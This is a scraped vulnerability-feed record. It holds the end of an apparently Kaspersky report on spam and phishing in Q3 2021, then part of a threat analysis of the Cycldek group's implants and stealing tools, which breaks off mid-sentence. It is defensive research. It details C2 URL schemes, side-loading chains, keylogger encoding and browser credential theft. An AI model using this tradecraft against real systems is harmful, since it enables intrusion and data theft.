of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children&#x27;s World, a major chain of kids&#x27; stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the &quot;promotion&quot; to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the &quot;lucky ones&quot; had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the &quot;winner&quot; was promised as a prize a QR code that could supposedly be used to make purchases in the company&#x27;s stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a &quot;commission&quot; before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly &quot;reads cookies from the victim&#x27;s device to estimate their market value.&quot; The &quot;valuation&quot; most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers&#x27; possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded on such platform. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to &quot;pay for legal services relating to form registration&quot;. The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which they removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim&#x27;s account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began &quot;selling&quot; their own. We also encountered rogue sites offering negative PCR test certificates. The &quot;customer&quot; was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the &quot;Nigerian prince&quot; scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, &quot;Nigerian prince&quot; scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina&#x27;s BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim&#x27;s system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim&#x27;s device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country&#x27;s share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories &quot;Social networks and blogs&quot; (6.24%) and &quot;IMs&quot; (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&amp;enpl=%s&amp;encd=%s | http://%s:%d/search.jsp?referer=%s&amp;kw=%s&amp;psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&amp;referer=%s&amp;kw=%s&amp;psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&amp;C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&amp;C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&amp;C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&amp;C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&amp;C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&amp;C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&amp;Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&amp;Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&amp;C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor 